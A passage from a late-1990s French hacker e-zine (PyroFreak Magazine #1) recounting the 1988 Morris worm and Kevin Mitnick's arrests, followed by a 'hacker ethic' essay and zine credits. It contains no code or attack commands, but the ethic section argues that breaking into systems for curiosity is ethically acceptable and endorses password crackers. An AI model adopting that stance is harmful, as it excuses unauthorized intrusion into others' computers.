virus qui a paralysé pendant plusieurs jours la quasi totalité des centres de
calcul universitaires et de recherche des Etats-Unis. L'auteur Robert Tappan
Morris a été condamné par le tribunal de Syracuse USA à 400 heures de "
service communautaire ", à trois ans de surveillance judiciaire et à 10 000
dollars d'amende. C'est la diffusion fulgurante du virus qui constitue la
caractéristique la plus étonnante de l'action du " ver " de Robert T.
Morris. Les premiers signes de l'épidémie sont apparus presque simultanément
sur les côtes Est et Ouest. A une demi-heure d'intervalle, le Massachusetts
Institute of Technology ( MIT ) et la Rand Corporation se trouvaient
infectés, le 2 novembre 1988 vers dix-huit heures. Le lendemain, des
centaines de Vax, des stations Sun ainsi que d'autre machines fonctionnant
sous Unix étaient elles aussi touchées. Les opérateurs relevaient des temps
de réponse fortement dégradés, leurs machines étant surchargées de travail
par l'exécution simultanée d'une multitude de tâches qui renaissaient
spontanément en dépit des efforts visant à les éliminer. Pire, une machine
arrêtée puis redémarrée se trouvait instantanément contaminée. En tout cas,
l'importance du fuck up provoquée par Robert T. Morris en ce " jeudi noir " a
démontré que, contrairement à ce que l'ont pense, les minis et moyens
systèmes fonctionnant sous Unix ne sont pas plus à l'abri des "épidémies
informatiques " que les micro-ordinateurs.
Internet, le réseau attaqué, relie entre elles toutes les universités
américaines et des milliers de sites. Son premier rôle reste l'acheminement
du courrier électronique des enseignants, des chercheurs et même des
étudiants, ce qui représente une population de plusieurs millions d'usagers.
Le même réseau autorise le transfert de fichiers et l'ouvertures de sessions
" console " sur des machines distantes.
Sitôt l'attaque détectée, les meilleurs chercheurs d'outre-Atlantique se sont
empressés de la combattre. Il leur a fallu deux jours pour démontrer le
mécanisme du ver. Un programme composé d'une centaine de lignes de C couplé à
deux fichiers " objet " (l'un propre aux serveurs Vax et l'autre aux stations
Sun) constituaient le vecteur d'infection. Aussitôt entré dans un
calculateur, le " Morris worm " établissait la liste des autres machines
connectées au même noeud du réseau et consacrait alors toutes les ressources
de la machine nouvellement conquise à la contamination des autres postes.
Un des processus de l'attaque consistait en une routine de craquage des "
mots de passe " (Comment font-ils?), remarquable pour sa vitesse. C'est à
cette tâche que le ver dépensait la plus grande partie du temps de travail
des machines colonisées.
Pour se défendre, le ver maintenait son propre code sous forme crypté
(cryptage). Et pour décourager les tentatives visant à le désassembler, il
changeait régulièrement de numéro de processus se rendant plus difficile à
déceler. Malgré tout, l'infection restait somme toute bénigne puisqu'elle ne
détruisait aucune donnée. Pour mémoire, notons que le père de l'étudiant
facétieux compte parmi les plus grands experts américains de la sécurité
informatique. Nul doute que R.T Morris suive le même chemin. Il est à noter
que les responsables de la sécurité ont su tirer les leçons de la
mésaventure. Dix ans après, une infection de cette envergure ne semble plus
possible.
Le roi des hackers ( d'après la revue espagnole Web )
Kevin Mitnick est le hors-la-loi le plus célèbre d'aujourd'hui. Surnommé par
la presse le roi des hackers, il a été arrêté par Tsutomu Shimomura et
l'histoire nous est racontée par un journaliste témoin de l'aventure John
Markoff sur http://www.takedown.com/. Deux pirates informatiques ont menacé
de détruire des millions d'ordinateurs si les autorités ne relâchaient pas
Kevin Mitnick, incarcéré il y a deux ans pour être entré dans différents
ordinateurs. Il a volé les codes secrets de quelques milliers de cartes
téléphoniques et accédé virtuellement à une base de missiles, entre autres.
Les deux pirates, qui se sont appelés eux-mêmes " Pants/Hagis ", ont accédé
au serveur du populaire moteur de recherche Yahoo ! Et y ont laissé un
message menaçant : "tous ceux qui ont utilisé le mois dernier le moteur de
recherches Yahoo ! ont attrapé une bombe logique qui s'activera le jour de
Noël 1998, semant le chaos dans tous les réseaux informatiques du monde ". Et
ils ont ajouté qu'ils ne donneraient l'antidote uniquement si Mitnick,
condamné ni plus ni moins qu' à 35 ans de prison, était libéré. Le
porte-parole de Yahoo! Diane Hunt, a reconnu que des hackers étaient rentrés
dans la page de l'entreprise mais sans rien détruire. Elle a ajouté que " il
est impossible que les ordinateurs s'étant connectés au serveur soient
infectés ". C'est en effet ce qui s'est passé, et la bombe imaginée par les
pirates n'a pas explosé. Mais le fait de sensibiliser l'opinion au cas
Mitnick avait été réussi. Qui est K. Mitnick ? Comme hacker sa carrière a
commencé à 16 ans quand, obsédé par les réseaux informatiques, il a forcé la
barrière de sécurité du système administratif de son collège. Pour Kevin, le
passetemps de ses dix dernières années fut d'explorer et exploiter les
compteurs d'autrui et les systèmes téléphoniques. Sa profession ? " cracker
", et sans aucun doute très bon. Selon le Département de Justice des Etats
Unis, ce " terroriste électronique " connu sous le nom de " El Condor ", a
été capable de créer des numéros de téléphones impossibles à facturer, de
s'approprier 20000 cartes de crédit d'habitants de la Californie, d'échapper
au FBI pendant plus de deux ans avec comme outil seulement un téléphone
cellulaire et un ordinateur portable.
Mitnick avait déjà été arrêté en 1988 pour avoir envahi le système de Digital
Equipment. Il fut déclaré coupable du chef d'accusation suivant "fraude
utilisant des ordinateurs", et pour possession illégale de codes d'accès de
longue distance. Il fut alors incarcéré puis privé de téléphone par la Cour
car, selon eux, il était capable d'accéder et de prendre le contrôle
d'un ordinateur avec un simple téléphone!
Credit: e-zines Anglais et Espagnol déjà publier.
Éthic d'apres ce que moi ([G]r4FX) pense.
L'Éthic du Hacker
1- Un Hacker crois en la liberter de l'information et que l'échange de cette
information en toute liberté est essentielle au bon fonctionnement d'une
société. Cet dans l'éthic du Hacker de faire partager son savoir en écrivant
des "Software" gratuit pour que cette information soit lu par le plus de
personne possible. En plus, un Hacker doit faciliter l'acces à cette
information par les "soft" qu'il a écrit et de faciliter l'acces de partout
au ressources informatiser.
2- Un Hacker croit aussi que le "cracking" d'un systeme informatik pour
le plaisir et pour la curiosité est éthiquement correct, tant et aussi
longtemsp longtemps que le "cracker" ne commets aucun vol vandalisme, ou
un "breach" de confidentialité. Ces deux principes éthics normatif sont
accepté par par plusieurs Hackers en grande partie mais ce ne sont pas
tous. La plupard des Hckers adèrent a l'éthic vu en (1).
Le sense numéro 2 est tres contreversé: il y a des hackers qui disent
que le "cracking" n'est pas "politiquement correct" mais tant qu'a moi pour
hacker un system il faut que trouve le "login" et le "password" donc pour
ce faire du doit utiliser un "password cracker", donc ...
____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
:
| N'oubliez pas, vous etes le seul responsable de vos actes!!!!
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __
Conclusion
J'espere que vous avez aimé le #1 de pyrofreakmag , si ce n'est pas le cas,
lisez pas le #2 parce que il va etre semblable. Si vous désirer faire publier
votre article dans le #2, envoyez le a pyrofreakmag@hotmail.com , ou via IRC
(#phreak.fr UNDERNET)-Site web:http://pyrophreak.cjb.net . Dans le prochain
numero, on va peut-etre faire une FAQ, cela va dépendre si on a beaucoup de
question par e-mail. Le #2 est fixer pour environ le 1er mars.
Pour commentaire ou suggestion : pyrofreakmag@hotmail.com
J'aimerais remercier tout le monde qui on participer au zine, en particulier
__2 pour le beau logo!!! Thank
@@@@@@@@@@@@@@@@@@@@Pyrofreakmag touts droits réservés@@@@@@@@@@@@@@@@@@@@@@